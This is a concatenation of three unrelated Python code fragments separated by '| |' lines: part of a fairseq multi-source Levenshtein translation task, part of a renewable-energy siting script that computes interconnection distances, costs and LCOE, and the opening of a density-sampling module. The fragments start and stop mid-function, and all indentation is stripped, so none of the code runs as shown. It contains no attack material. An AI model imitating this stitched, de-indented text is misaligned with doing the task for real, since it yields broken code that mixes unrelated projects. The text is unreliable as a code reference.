src_dataset = src_datasets[0]
tgt_dataset = tgt_datasets[0] if len(tgt_datasets) > 0 else None
for n in range(num_multi_src):
multi_src_datasets[n] = (
multi_src_datasets[n][0] if len(multi_src_datasets[n]) > 0 else None
)
else:
sample_ratios = [1] * len(src_datasets)
sample_ratios[0] = upsample_primary
src_dataset = ConcatDataset(src_datasets, sample_ratios)
if len(tgt_datasets) > 0:
tgt_dataset = ConcatDataset(tgt_datasets, sample_ratios)
else:
tgt_dataset = None
for n in range(num_multi_src):
multi_src_datasets[n] = ConcatDataset(multi_src_datasets[n], sample_ratios)
if prepend_bos:
assert hasattr(src_dict, "bos_index") and hasattr(tgt_dict, "bos_index")
src_dataset = PrependTokenDataset(src_dataset, src_dict.bos())
if tgt_dataset is not None:
tgt_dataset = PrependTokenDataset(tgt_dataset, tgt_dict.bos())
if multi_src_datasets is not None:
for n in range(num_multi_src):
if multi_src_datasets[n] is not None:
multi_src_datasets[n] = PrependTokenDataset(
multi_src_datasets[n], tgt_dict.bos()
)
elif prepend_bos_src is not None:
logger.info(f"prepending src bos: {prepend_bos_src}")
src_dataset = PrependTokenDataset(src_dataset, prepend_bos_src)
eos = None
if append_source_id:
src_dataset = AppendTokenDataset(
src_dataset, src_dict.index("[{}]".format(src))
)
if tgt_dataset is not None:
tgt_dataset = AppendTokenDataset(
tgt_dataset, tgt_dict.index("[{}]".format(tgt))
)
if multi_src_datasets is not None:
for n in range(num_multi_src):
if multi_src_datasets[n] is not None:
multi_src_datasets[n] = AppendTokenDataset(
multi_src_datasets[n], tgt_dict.index("[{}]".format(tgt))
)
eos = tgt_dict.index("[{}]".format(tgt))
align_dataset = None
if load_alignments:
align_path = os.path.join(data_path, "{}.align.{}-{}".format(split, src, tgt))
if indexed_dataset.dataset_exists(align_path, impl=dataset_impl):
align_dataset = data_utils.load_indexed_dataset(
align_path, None, dataset_impl
)
tgt_dataset_sizes = tgt_dataset.sizes if tgt_dataset is not None else None
multi_src_sizes = [
single.sizes if single is not None else None for single in multi_src_datasets
]
return LanguageMultiSourceDataset(
src_dataset,
src_dataset.sizes,
src_dict,
multi_src_datasets,
multi_src_sizes,
tgt_dataset,
tgt_dataset_sizes,
tgt_dict,
left_pad_source=left_pad_source,
left_pad_target=left_pad_target,
align_dataset=align_dataset,
eos=eos,
num_buckets=num_buckets,
shuffle=shuffle,
pad_to_multiple=pad_to_multiple,
)
@register_task("multi_translation_lev", dataclass=TranslationMultiLevenshteinConfig)
class TranslationMultiLevenshteinTask(TranslationTask):
"""
Translation (Sequence Generation) task for Levenshtein Transformer
See `"Levenshtein Transformer" <https://arxiv.org/abs/1905.11006>`_.
"""
cfg: TranslationMultiLevenshteinConfig
# @staticmethod
# def add_args(parser):
# TranslationTask.add_args(parser)
# parser.add_argument(
# "--num-retrieved",
# default=3,
# type=int,
# help="Number of sentences retrieved, then edited together to form the final sentence",
# )
tokenizer = None
def load_dataset(self, split, epoch=1, combine=False, **kwargs):
"""Load a given dataset split.
Args:
split (str): name of the split (e.g., train, valid, test)
"""
paths = utils.split_paths(self.cfg.data)
assert len(paths) > 0
data_path = paths[(epoch - 1) % len(paths)]
# infer langcode
src, tgt = self.cfg.source_lang, self.cfg.target_lang
self.datasets[split] = load_lang_multi_dataset(
data_path,
split,
src,
self.src_dict,
tgt,
self.tgt_dict,
self.cfg.num_retrieved,
combine=combine,
dataset_impl=self.cfg.dataset_impl,
upsample_primary=self.cfg.upsample_primary,
left_pad_source=self.cfg.left_pad_source,
left_pad_target=self.cfg.left_pad_target,
max_source_positions=self.cfg.max_source_positions,
max_target_positions=self.cfg.max_target_positions,
prepend_bos=True,
)
def get_batch_iterator(
self,
dataset,
max_tokens=None,
max_sentences=None,
max_positions=None,
ignore_invalid_inputs=False,
required_batch_size_multiple=1,
seed=1,
num_shards=1,
shard_id=0,
num_workers=0,
epoch=1,
data_buffer_size=0,
disable_iterator_cache=False,
):
"""
Get an iterator that yields batches of data from the given dataset.
Args:
dataset (~fairseq.data.FairseqDataset): dataset to batch
max_tokens (int, optional): max number of tokens in each batch
(default: None).
max_sentences (int, optional): max number of sentences in each
batch (default: None).
max_positions (optional): max sentence length supported by the
model (default: None).
ignore_invalid_inputs (bool, optional): don't raise Exception for
sentences that are too long (default: False).
required_batch_size_multiple (int, optional): require batch size to
be a multiple of N (default: 1).
seed (int, optional): seed for random number generator for
reproducibility (default: 1).
num_shards (int, optional): shard the data iterator into N
shards (default: 1).
shard_id (int, optional): which shard of the data iterator to
return (default: 0).
num_workers (int, optional): how many subprocesses to use for data
loading. 0 means the data will be loaded in the main process
(default: 0).
epoch (int, optional): the epoch to start the iterator from
(default: 1).
data_buffer_size (int, optional): number of batches to
preload (default: 0).
disable_iterator_cache (bool, optional): don't cache the
EpochBatchIterator (ignores `FairseqTask::can_reuse_epoch_itr`)
(default: False).
Returns:
~fairseq.iterators.EpochBatchIterator: a batched iterator over the
given dataset split
"""
can_reuse_epoch_itr = not disable_iterator_cache and self.can_reuse_epoch_itr(
dataset
)
if can_reuse_epoch_itr and dataset in self.dataset_to_epoch_iter:
logger.debug("reusing EpochBatchIterator for epoch {}".format(epoch))
return self.dataset_to_epoch_iter[dataset]
assert isinstance(dataset, FairseqDataset)
# initialize the dataset with the correct starting epoch
dataset.set_epoch(epoch)
# get indices ordered by example size
with data_utils.numpy_seed(seed):
indices = dataset.ordered_indices()
# filter examples that are too large
if max_positions is not None:
indices = self.filter_indices_by_size(
indices,
dataset,
max_positions,
ignore_invalid_inputs,
max_acceptable_retrieved_ratio=self.cfg.max_acceptable_retrieved_ratio,
)
# create mini-batches with given size constraints
batch_sampler = dataset.batch_by_size(
indices,
max_tokens=max_tokens,
max_sentences=max_sentences,
required_batch_size_multiple=required_batch_size_multiple,
)
# return a reusable, sharded iterator
epoch_iter = iterators.EpochBatchIterator(
dataset=dataset,
collate_fn=dataset.collater,
batch_sampler=batch_sampler,
seed=seed,
num_shards=num_shards,
shard_id=shard_id,
num_workers=num_workers,
epoch=epoch,
buffer_size=data_buffer_size,
)
if can_reuse_epoch_itr:
self.dataset_to_epoch_iter[dataset] = epoch_iter
return epoch_iter
def inject_noise(self, target_tokens):
def _random_delete(target_tokens):
pad = self.tgt_dict.pad()
bos = self.tgt_dict.bos()
eos = self.tgt_dict.eos()
max_len = target_tokens.size(1)
target_mask = target_tokens.eq(pad)
target_score = target_tokens.clone().float().uniform_()
target_score.masked_fill_(
target_tokens.eq(bos) | target_tokens.eq(eos), 0.0
)
target_score.masked_fill_(target_mask, 1)
target_score, target_rank = target_score.sort(1)
target_length = target_mask.size(1) - target_mask.float().sum(
1, keepdim=True
)
# do not delete <bos> and <eos> (we assign 0 score for them)
target_cutoff = (
2
+ (
(target_length - 2)
* target_score.new_zeros(target_score.size(0), 1).uniform_()
).long()
)
target_cutoff = target_score.sort(1)[1] >= target_cutoff
prev_target_tokens = (
target_tokens.gather(1, target_rank)
.masked_fill_(target_cutoff, pad)
.gather(1, target_rank.masked_fill_(target_cutoff, max_len).sort(1)[1])
)
prev_target_tokens = prev_target_tokens[
:, : prev_target_tokens.ne(pad).sum(1).max()
]
return prev_target_tokens
def _random_mask(target_tokens):
pad = self.tgt_dict.pad()
bos = self.tgt_dict.bos()
eos = self.tgt_dict.eos()
unk = self.tgt_dict.unk()
target_masks = (
target_tokens.ne(pad) & target_tokens.ne(bos) & target_tokens.ne(eos)
)
target_score = target_tokens.clone().float().uniform_()
target_score.masked_fill_(~target_masks, 2.0)
target_length = target_masks.sum(1).float()
target_length = target_length * target_length.clone().uniform_()
target_length = target_length + 1 # make sure to mask at least one token.
_, target_rank = target_score.sort(1)
target_cutoff = new_arange(target_rank) < target_length[:, None].long()
prev_target_tokens = target_tokens.masked_fill(
target_cutoff.scatter(1, target_rank, target_cutoff), unk
)
return prev_target_tokens
def _full_mask(target_tokens):
pad = self.tgt_dict.pad()
bos = self.tgt_dict.bos()
eos = self.tgt_dict.eos()
unk = self.tgt_dict.unk()
target_mask = (
target_tokens.eq(bos) | target_tokens.eq(eos) | target_tokens.eq(pad)
)
return target_tokens.masked_fill(~target_mask, unk)
if self.cfg.noise == "random_delete":
return _random_delete(target_tokens)
elif self.cfg.noise == "random_mask":
return _random_mask(target_tokens)
elif self.cfg.noise == "no_noise":
return target_tokens
else:
raise NotImplementedError
def build_generator(self, models, args, **unused):
# add models input to match the API for SequenceGenerator
from fairseq.iterative_refinement_generator import IterativeRefinementGenerator
# from fairseq.sequence_generator import SequenceGenerator
return IterativeRefinementGenerator(
self.target_dictionary,
beam_size=getattr(args, "decode_with_beam", 1),
eos_penalty=getattr(args, "decode_eos_penalty", 0.0),
max_ratio=getattr(args, "decode_max_ratio", None),
max_iter=1,
)
def build_dataset_for_inference(
self,
src_tokens,
src_lengths,
multi_src_tokens,
multi_src_sizes,
constraints=None,
):
if constraints is not None:
# | |
(not IPM regions), by default None
remove_ny_z_j : bool, optional
If the IPM region NY_Z_J (NYC) should be removed, by default False
Returns
-------
gpd.GeoDataFrame
[description]
"""
_metro_areas_gdf = metro_areas_gdf.copy()
_metro_areas_gdf["geometry"] = _metro_areas_gdf["center"]
# metro_ipm_gdf = gpd.sjoin(ipm_gdf, _metro_areas_gdf, how="left", op="intersects")
metro_ipm_gdf = gpd.sjoin(ipm_gdf, _metro_areas_gdf, how="left", op="contains")
# Don't put Sacremento in CALN because it is also in BANC
metro_ipm_gdf = metro_ipm_gdf.loc[
~(
(metro_ipm_gdf["metro_id"] == "40900")
& (metro_ipm_gdf["IPM_Region"] == "WEC_CALN")
),
:,
]
# Set population of Cheyenne, WY to 800k to force it as the major city in WECC_WY.
# Otherwise Rapid City, SD is the largest city in WECC_WY, and we believe it should
# not be the delivery point for this region.
metro_ipm_gdf.loc[metro_ipm_gdf["cbsa_id"] == "16940", "population"] = 800000
df_list = []
grouped = metro_ipm_gdf.groupby("IPM_Region", as_index=False)
for _, _df in grouped:
n_df = _df.loc[_df["population"] >= min_population, :]
if max_cities_per_region:
n_df = n_df.nlargest(max_cities_per_region, "population")
# If there aren't any city that meet population criteria keep the largest city
if n_df.empty:
n_df = _df.nlargest(1, "population")
df_list.append(n_df)
largest_cities = pd.concat(df_list, ignore_index=True)
if additional_metros:
user_metros = metro_ipm_gdf.query("metro_id in @additional_metros")
largest_cities = pd.concat([largest_cities, user_metros], ignore_index=True)
lats = [center.y for center in largest_cities.center]
lons = [center.x for center in largest_cities.center]
largest_cities["latitude"] = lats
largest_cities["longitude"] = lons
extra_pjm_location_data = {
"IPM_Region": ["PJM_NJLand"],
"metro_id": ["substation_143941"],
"name": ["<NAME>, NJ"],
"state": ["NJ"],
"longitude": [-74.48014],
"latitude": [40.45829],
"center": [Point(-74.48014, 40.45829)],
}
largest_cities = largest_cities.append(
gpd.GeoDataFrame(
extra_pjm_location_data,
geometry=[Point(-74.48014, 40.45829)],
crs="EPSG:4326",
), ignore_index=True
)
if remove_ny_z_j:
largest_cities = largest_cities.loc[
largest_cities["metro_id"] != "NY_Z_J", :
].reset_index(drop=True)
return largest_cities
def cartesian(latitude, longitude, elevation=0):
"https://www.timvink.nl/closest-coordinates/"
# Convert to radians
latitude = latitude * (math.pi / 180)
longitude = longitude * (math.pi / 180)
R = 6371 # 6378137.0 + elevation # relative to centre of the earth
X = R * math.cos(latitude) * math.cos(longitude)
Y = R * math.cos(latitude) * math.sin(longitude)
Z = R * math.sin(latitude)
return (X, Y, Z)
def ckdnearest(gdA, gdB):
"https://gis.stackexchange.com/a/301935"
coordsA = []
for index, row in gdA.iterrows():
coordinates = [row["Latitude"], row["Longitude"]]
cartesian_coord = cartesian(*coordinates)
coordsA.append(cartesian_coord)
coordsB = []
for index, row in gdB.iterrows():
coordinates = [row["latitude"], row["longitude"]]
cartesian_coord = cartesian(*coordinates)
coordsB.append(cartesian_coord)
# nA = np.array(list(zip(gdA.Latitude, gdA.Longitude)))
# nB = np.array(list(zip(gdB["latitude"], gdB["longitude"])))
btree = cKDTree(coordsB)
dist, idx = btree.query(coordsA, k=1)
gdB.rename(columns={"latitude": "lat2", "longitude": "lon2"}, inplace=True)
gdf = pd.concat(
[
gdA.reset_index(drop=True),
gdB.loc[idx, gdB.columns != "geometry"].reset_index(drop=True),
],
axis=1,
)
gdf["dist_mile"] = gdf.apply(
lambda row: haversine(
row["Longitude"], row["Latitude"], row["lon2"], row["lat2"], units="mile"
),
axis=1,
)
return gdf
def wa_capex(nearest_df):
wa = np.average(nearest_df["interconnect_capex"], weights=nearest_df["km2"])
return wa
def label_site_region(gdf, id_col, lat, lon):
mask = pd.Series(index=range(len(lat)), dtype=str)
for n in gdf.index:
dataGeom = gdf["geometry"][n]
data_mask = shapely.vectorized.contains(dataGeom, lon, lat)
mask[data_mask] = gdf[id_col][n]
return mask
def calc_interconnect_distances(
site_gdf, substation_gdf, metro_gdf, site_id_col="cpa_id"
):
# Substation to nearest metro
_substation_gdf = substation_gdf.rename(
columns={"latitude": "Latitude", "longitude": "Longitude"}
)
nearest_substation_metro = ckdnearest(
_substation_gdf.query("substation_state != 'DE'"),
metro_gdf.reset_index(drop=True),
)
nearest_substation_metro_de = ckdnearest(
_substation_gdf.query("substation_state == 'DE'"),
metro_gdf.query("state != 'NJ'").reset_index(drop=True),
)
nearest_substation_metro_all = pd.concat(
[nearest_substation_metro, nearest_substation_metro_de], ignore_index=True
)
nearest_substation_metro_all = nearest_substation_metro_all.rename(
columns={"dist_mile": "substation_metro_tx_miles"}
)
if "latitude" not in substation_gdf.columns:
print("lowercase lat isn't in substation_gdf")
substation_gdf = substation_gdf.rename(
columns={"latitude": "Latitude", "longitude": "Longitude"}
)
# print(substation_gdf.head())
# Site to nearest substation
nearest_site_substation = ckdnearest(
site_gdf.reset_index(drop=True),
substation_gdf.reset_index(drop=True)
# .rename(
# columns={"Latitude": "latitude", "Longitude": "longitude"}
# )
)
nearest_site_substation = nearest_site_substation.rename(
columns={"dist_mile": "site_substation_spur_miles"}
)
# print(metro_gdf.head())
# Site to nearest metro (direct spur line)
nearest_site_metro = ckdnearest(
site_gdf.reset_index(drop=True),
metro_gdf.drop(columns=["IPM_Region"]).reset_index(drop=True),
)
# nearest_site_metro = nearest_site_metro.drop_duplicates(
# subset=["cpa_id", "cbsa_id"]
# )
nearest_site_metro = nearest_site_metro.rename(
columns={"dist_mile": "site_metro_spur_miles"}
)
# Combine all of the distances into a single dataframe
# Mapping is probably slower (b/c of setting the index) than merges but it helps
# ensure unique IDs for sites and substations
site_substation_metro = nearest_site_substation.copy()
site_substation_metro["substation_metro_tx_miles"] = site_substation_metro[
"substation_id"
].map(
nearest_substation_metro_all.set_index("substation_id")[
"substation_metro_tx_miles"
]
)
site_substation_metro["substation_nearest_metro"] = site_substation_metro[
"substation_id"
].map(nearest_substation_metro_all.set_index("substation_id")["metro_id"])
site_substation_metro["site_metro_spur_miles"] = site_substation_metro[
site_id_col
].map(nearest_site_metro.set_index(site_id_col)["site_metro_spur_miles"])
site_substation_metro["site_nearest_metro"] = site_substation_metro[
site_id_col
].map(nearest_site_metro.set_index(site_id_col)["metro_id"])
# nan_sites = site_substation_metro.loc[site_substation_metro["metro_id"].isnull(), :]
# num_nan_sites = len(nan_sites)
# if num_nan_sites > 0:
# egrid_col = "eGrid_to_E"
# nan_regions = list(nan_sites[egrid_col].unique())
# print(
# f"There are {num_nan_sites} CPAs with no associated metro.\n"
# "This is probably because the site centroid is outside US borders.\n"
# f"The sites are located in {nan_regions} eGRID region(s),"
# " and are being removed."
# )
# site_substation_metro = site_substation_metro.dropna(subset=["metro_id"])
return site_substation_metro
def calc_interconnect_costs_lcoe(site_substation_metro, resource, cap_rec_years=20):
financials_dict = load_atb_capex_wacc()
regional_cost_multipliers = load_regional_cost_multipliers()
site_substation_metro_lcoe = site_substation_metro.copy()
# Calculate interconnection capex, min of direct to metro and through a substation.
# Include the difference in spur line and high-voltage tx costs by region.
ipm_spur_costs = {
ipm_region: spur_costs_2017[agg_region]
for ipm_region, agg_region in rev_region_mapping.items()
}
ipm_tx_costs = {
ipm_region: tx_costs_2017[agg_region]
for ipm_region, agg_region in rev_region_mapping.items()
}
site_substation_metro_lcoe.loc[
:, "spur_capex_mw_mile"
] = site_substation_metro_lcoe["IPM_Region"].map(ipm_spur_costs)
site_substation_metro_lcoe.loc[:, "metro_direct_capex"] = (
site_substation_metro_lcoe.loc[:, "spur_capex_mw_mile"]
* site_substation_metro_lcoe.loc[:, "site_metro_spur_miles"]
)
site_substation_metro_lcoe.loc[:, "site_substation_capex"] = (
site_substation_metro_lcoe.loc[:, "spur_capex_mw_mile"]
* site_substation_metro_lcoe.loc[:, "site_substation_spur_miles"]
)
site_substation_metro_lcoe.loc[:, "tx_capex_mw_mile"] = site_substation_metro_lcoe[
"IPM_Region"
].map(ipm_tx_costs)
site_substation_metro_lcoe.loc[:, "substation_metro_capex"] = (
site_substation_metro_lcoe.loc[:, "tx_capex_mw_mile"]
* site_substation_metro_lcoe.loc[:, "substation_metro_tx_miles"]
)
site_substation_metro_lcoe.loc[:, "site_substation_metro_capex"] = (
site_substation_metro_lcoe.loc[:, "site_substation_capex"]
+ site_substation_metro_lcoe.loc[:, "substation_metro_capex"]
)
site_substation_metro_lcoe.loc[
:, "interconnect_capex"
] = site_substation_metro_lcoe[
["site_substation_metro_capex", "metro_direct_capex"]
].min(
axis=1
)
# Calc site capex, including regional cost multipliers
capex_lambda = (
lambda x: regional_cost_multipliers.loc[rev_cost_mult_region_map[x], "Wind"]
* financials_dict["capex_mw"][resource]
)
# wind_capex_lambda = (
# lambda x: regional_cost_multipliers.loc[rev_cost_mult_region_map[x], "Wind"]
# * financials_dict["capex"]["wind"]
# )
# solarpv_capex_lambda = (
# lambda x: regional_cost_multipliers.loc[
# rev_cost_mult_region_map[x], "Solar PV—tracking"
# ]
# * financials_dict["capex"]["solarpv"]
# )
capex_map = {
region: capex_lambda(region) for region in rev_cost_mult_region_map.keys()
}
# wind_capex_map = {
# region: wind_capex_lambda(region) for region in rev_cost_mult_region_map.keys()
# }
# solarpv_capex_map = {
# region: solarpv_capex_lambda(region)
# for region in rev_cost_mult_region_map.keys()
# }
print(f"Assigning {resource} capex values")
site_substation_metro_lcoe.loc[:, "capex_mw"] = site_substation_metro_lcoe[
"IPM_Region"
].map(capex_map)
# site_substation_metro_lcoe.loc[:, "solarpv_capex"] = site_substation_metro_lcoe[
# "IPM_Region"
# ].map(solarpv_capex_map)
# site_substation_metro_lcoe.loc[:, "wind_capex"] = site_substation_metro_lcoe[
# "IPM_Region"
# ].map(wind_capex_map)
# Calculate site, interconnect, and total annuities
print(f"Calculating {resource} annuities")
site_substation_metro_lcoe["resource_annuity"] = investment_cost_calculator(
capex=site_substation_metro_lcoe["capex_mw"],
wacc=financials_dict["wacc"][resource],
cap_rec_years=cap_rec_years,
)
# site_substation_metro_lcoe["solarpv_annuity"] = investment_cost_calculator(
# capex=site_substation_metro_lcoe["solarpv_capex"],
# wacc=financials_dict["wacc"]["solarpv"],
# cap_rec_years=cap_rec_years,
# )
# print("Calculating wind annuities")
# site_substation_metro_lcoe["wind_annuity"] = investment_cost_calculator(
# capex=site_substation_metro_lcoe["wind_capex"],
# wacc=financials_dict["wacc"]["wind"],
# cap_rec_years=cap_rec_years,
# )
print("Calculating interconnect annuities")
site_substation_metro_lcoe.loc[
:, "interconnect_annuity"
] = investment_cost_calculator(
capex=site_substation_metro_lcoe["interconnect_capex"],
wacc=spur_line_wacc,
cap_rec_years=spur_line_investment_years,
)
site_substation_metro_lcoe.loc[:, "total_site_annuity"] = (
site_substation_metro_lcoe.loc[:, "resource_annuity"]
+ site_substation_metro_lcoe.loc[:, "interconnect_annuity"]
)
# site_substation_metro_lcoe.loc[:, "total_wind_site_annuity"] = (
# site_substation_metro_lcoe.loc[:, "wind_annuity"]
# + site_substation_metro_lcoe.loc[:, "interconnect_annuity"]
# )
# site_substation_metro_lcoe.loc[:, "total_solarpv_site_annuity"] = (
# site_substation_metro_lcoe.loc[:, "solarpv_annuity"]
# + site_substation_metro_lcoe.loc[:, "interconnect_annuity"]
# )
# Use site capacity factor to calculate LCOE
# The column "Site" identifies the VCE site.
site_cf_dict = load_site_capacity_factors(site_substation_metro_lcoe)
variable = {
"wind": "2012 100m Average Capacity Factor",
"solarpv": "Axis1_SolarPV_Lat_CF",
}
site_substation_metro_lcoe.loc[:, f"{resource}_cf"] = (
site_substation_metro_lcoe["Site"].map(
site_cf_dict[resource][variable[resource]]
)
/ 100
)
# site_substation_metro_lcoe.loc[:, "solarpv_tracking_cf"] = (
# site_substation_metro_lcoe["Site"].map(
# site_cf_dict["solarpv"]["Axis1_SolarPV_Lat_CF"]
# )
# / 100
# )
# site_substation_metro_lcoe.loc[:, "wind_100m_cf"] = (
# site_substation_metro_lcoe["Site"].map(
# site_cf_dict["wind"]["2012 100m Average Capacity Factor"]
# )
# / 100
# )
site_substation_metro_lcoe.loc[:, "lcoe"] = site_substation_metro_lcoe.loc[
:, "total_site_annuity"
] / (site_substation_metro_lcoe.loc[:, f"{resource}_cf"] * 8760)
# site_substation_metro_lcoe.loc[:, "wind_lcoe"] = site_substation_metro_lcoe.loc[
# :, "total_wind_site_annuity"
# ] / (site_substation_metro_lcoe.loc[:, "wind_100m_cf"] * 8760)
# site_substation_metro_lcoe.loc[:, "solarpv_lcoe"] = site_substation_metro_lcoe.loc[
# :, "total_solarpv_site_annuity"
# ] / (site_substation_metro_lcoe.loc[:, "solarpv_tracking_cf"] * 8760)
return site_substation_metro_lcoe
def main(
resource="solarpv",
scenario="base",
additional_metros: Optional[List[str]] = typer.Option(None),
voronoi_gdf_fn: str = "large_metro_voronoi.geojson",
fn_prefix: str = "",
):
print("Loading states, voronoi, and CPAs")
us_states = load_us_states_gdf()
metro_voronoi_gdf = gpd.read_file(voronoi_gdf_fn)
cpa_files = {
# "wind": "2020-05-19-OnshoreWind-Base-upto30deg_shp",
# "solarpv": "2020-05-28-SolarBase15deg_CPAs_shapefile",
"wind": "Wind_CPA_BLUA_20210125",
"solarpv": "Solar_CPA_BLUA_20210125",
}
cpa_slope_filter = {"wind": 19, "solarpv": 10}
cpa_gdf = load_cpa_gdf(
cpa_files[resource],
target_crs=us_states.crs,
slope_filter=cpa_slope_filter[resource],
)
# if "m_slope" in cpa_gdf.columns:
# cpa_gdf = cpa_gdf.loc[cpa_gdf["m_slope"] <= cpa_slope_filter[resource], :]
# cpa_gdf = cpa_gdf.reset_index(drop=True)
cpa_gdf["state"] = label_site_region(
gdf=us_states, id_col="NAME", lat=cpa_gdf.Latitude, lon=cpa_gdf.Longitude
)
# cpa_gdf["metro_id"] = label_site_region(
# gdf=metro_voronoi_gdf,
# id_col="metro_id",
# lat=cpa_gdf.Latitude,
# lon=cpa_gdf.Longitude,
# )
# cpa_gdf["city"] = cpa_gdf["metro_id"].map(
# metro_voronoi_gdf.set_index("cbsa_id")["name"]
# )
# cpa_gdf["IPM_Region"] = cpa_gdf["metro_id"].map(
# metro_voronoi_gdf.set_index("metro_id")["IPM_Region"]
# )
site_locations = load_site_locations()
site_locations = site_locations.rename(
columns={"Latitude": "latitude", "Longitude": "longitude"}
)
cpa_vce_site = ckdnearest(cpa_gdf.copy(), site_locations.copy())
cpa_vce_site = cpa_vce_site.drop(columns=["lat2", "lon2"])
print("Loading other data")
substation_gdf = load_substations(min_kv=161)
# substation_gdf = substation_gdf.rename(
# columns={"latitude": "Latitude", "longitude": "Longitude"}
# )
ipm_gdf = load_ipm_shapefile()
metro_gdf = load_metro_areas_shapefile()
| |
#!/usr/bin/env python
# Density_Sampling/Density_Sampling.py
# Author: <NAME> for the GC Yuan Lab
# Affiliation: Harvard University
# Contact: <EMAIL>, <EMAIL>
"""For a data-set comprising a mixture of rare and common populations,
density sampling gives equal weights to selected representatives
of those distinct populations.
Density sampling is a balancing act between signal and noise. Indeed, while
it increases the prevalence of rare populations, it also increases the prevalence
of noisy sample points that would happen to have their local densities larger than
an outlier density computed by Density_Sampling.
An illustration of how to use the present module is in order:
>>> iris = datasets.load_iris()
>>> Y = iris.target
>>> X_reduced = PCA(n_components = 3).fit_transform(iris.data)
>>> plot_PCA(X_reduced, Y, 'the whole Iris data-set')
>>> sampled_indices = density_sampling(X_reduced, metric = 'euclidean', desired_samples = 50)
>>> downsampled_X_reduced = X_reduced[sampled_indices, :]
>>> downsampled_Y = Y[sampled_indices]
>>> plot_PCA(downsampled_X_reduced, downsampled_Y, 'the Iris data-set\ndown-sampled to about 50 samples')
Reference
---------
<NAME>., <NAME>., <NAME>. and <NAME>.,
"Robust Lineage Reconstruction from High-Dimensional Single-Cell Data".
ArXiv preprint [q-bio.QM, stat.AP, stat.CO, stat.ML]: http://arxiv.org/abs/1601.02748
"""
import numbers
import numpy as np
import operator
import psutil
from sklearn.metrics.pairwise import pairwise_distances
from sklearn.neighbors import kneighbors_graph
from sklearn.neighbors import radius_neighbors_graph
from sys import exit
from tempfile import NamedTemporaryFile
__all__ = ['get_local_densities', 'density_sampling']
def memory():
"""Determine memory specifications of the machine.
Returns
-------
mem_info : dictonary
Holds the current values for the total, free and used memory of the system.
"""
mem_info = dict()
for k, v in psutil.virtual_memory().__dict__.iteritems():
mem_info[k] = int(v)
return mem_info
def get_chunk_size(N, n):
"""Given a two-dimensional array with a dimension of size 'N',
determine the number of rows or columns that can fit into memory.
Parameters
----------
N : int
The size of one of the dimensions of a two-dimensional array.
n : int
The number of arrays of size 'N' times 'chunk_size' that can fit in memory.
Returns
-------
chunk_size : int
The size of the dimension orthogonal to the one of size 'N'.
"""
mem_free = memory()['free']
if mem_free > 60000000:
chunk_size = int(((mem_free - 10000000) * 1000) / (4 * n * N))
return chunk_size
elif mem_free > 40000000:
chunk_size = int(((mem_free - 7000000) * 1000) / (4 * n * N))
return chunk_size
elif mem_free > 14000000:
chunk_size = int(((mem_free - 2000000) * 1000) / (4 * n * N))
return chunk_size
elif mem_free > 8000000:
chunk_size = int(((mem_free - 1400000) * 1000) / (4 * n * N))
return chunk_size
elif mem_free > 2000000:
chunk_size = int(((mem_free - 900000) * 1000) / (4 * n * N))
return chunk_size
elif mem_free > 1000000:
chunk_size = int(((mem_free - 400000) * 1000) / (4 * n * N))
return chunk_size
else:
print("\nERROR: Density_Sampling: get_chunk_size: this machine does not "
"have enough free memory.\n")
exit(1)
def median_min_distance(data, metric):
"""This function computes a graph of nearest-neighbors for each sample point in
'data' and returns the median of the distribution of distances between those
nearest-neighbors, the distance metric being specified by 'metric'.
Parameters
----------
data : array of shape (n_samples, n_features)
The data-set, a fraction of whose sample points will be extracted
by density sampling.
metric : string
The distance metric used to determine the nearest-neighbor to each data-point.
The DistanceMetric class defined in scikit-learn's library lists all available
metrics.
Returns
-------
median_min_dist : float
The median of the distribution of distances between nearest-neighbors.
"""
data = np.atleast_2d(data)
nearest_distances = kneighbors_graph(data, 1, mode = 'distance', metric = metric, include_self = False).data
median_min_dist = np.median(nearest_distances, overwrite_input = True)
return round(median_min_dist, 4)
def get_local_densities(data, kernel_mult = 2.0, metric = 'manhattan'):
"""For each sample point of the data-set 'data', estimate a local density in feature
space by counting the number of neighboring data-points within a particular
region centered around that sample point.
Parameters
----------
data : array of shape (n_samples, n_features)
The data-set, a fraction of whose sample points will be extracted
by density sampling.
kernel_mult : float, optional (default = 2.0)
The kernel multiplier, which determine (in terms of the median of the distribution
of distances among nearest neighbors) the extent of the regions centered
around each sample point to consider for the computation of the local density
associated to that particular sample point.
metric : string, optional (default = 'manhattan')
The distance metric used to determine the nearest-neighbor to each data-point.
The DistanceMetric class defined in scikit-learn's library lists all available
metrics.
Returns
-------
local_densities : array of shape (n_samples,)
The i-th entry of this vector corresponds to the local density of the i-th sample
point in the order of the rows of 'data'.
"""
data = np.atleast_2d(data)
assert isinstance(kernel_mult, numbers.Real) and kernel_mult > 0
kernel_width = kernel_mult * median_min_distance(data, metric)
N_samples = data.shape[0]
if 8.0 * get_chunk_size(N_samples, 1) > N_samples:
A = radius_neighbors_graph(data, kernel_width, mode = 'connectivity', metric = metric, include_self = True)
rows, _ = A.nonzero()
with NamedTemporaryFile('w', delete = True, dir = './') as file_name:
fp = np.memmap(file_name, dtype = int, mode = 'w+', shape = rows.shape)
fp[:] = rows[:]
_, counts = np.unique(fp, return_counts = True)
local_densities = np.zeros(N_samples, dtype = int)
for i in xrange(N_samples):
local_densities[i] = counts[i]
else:
local_densities = np.zeros(N_samples, dtype = int)
chunks_size = get_chunk_size(N_samples, 2)
for i in xrange(0, N_samples, chunks_size):
chunk = data[i:min(i + chunks_size, N_samples)]
D = pairwise_distances(chunk, data, metric, n_jobs = 1)
D = (D <= kernel_width)
local_densities[i + np.arange(min(chunks_size, N_samples - i))] = D.sum(axis = 1)
return local_densities
def density_sampling(data, local_densities = None, metric = 'manhattan',
kernel_mult = 2.0, outlier_percentile = 0.01,
target_percentile = 0.05, desired_samples = None):
"""The i-th sample point of the data-set 'data' is selected by density sampling
with a probability given by:
| 0 if outlier_density > LD[i];
P(keep the i-th data-point) = | 1 if outlier_density <= LD[i] <= target_density;
| target_density / LD[i] if LD[i] > target_density.
Here 'LD[i]' denotes the local density of the i-th sample point of the data-set,
whereas 'outlier_density' and 'target_density' are computed as particular percentiles
of that distribution of local densities.
Parameters
----------
data : array of shape (n_samples, n_features)
The data-set, a fraction of whose sample points will be extracted
by density sampling.
local_densities : array of shape (n_samples,), optional (default = None)
The i-th entry of this vector corresponds to the local density of the i-th sample
point in the order of the rows of 'data'.
metric : string, optional (default = 'manhattan')
The distance metric used to determine the nearest-neighbor to each data-point.
The DistanceMetric class defined in scikit-learn's library lists all available
metrics.
kernel_mult : float, optional (default = 2.0)
The kernel multiplier, which determine (in terms of the median of the distribution
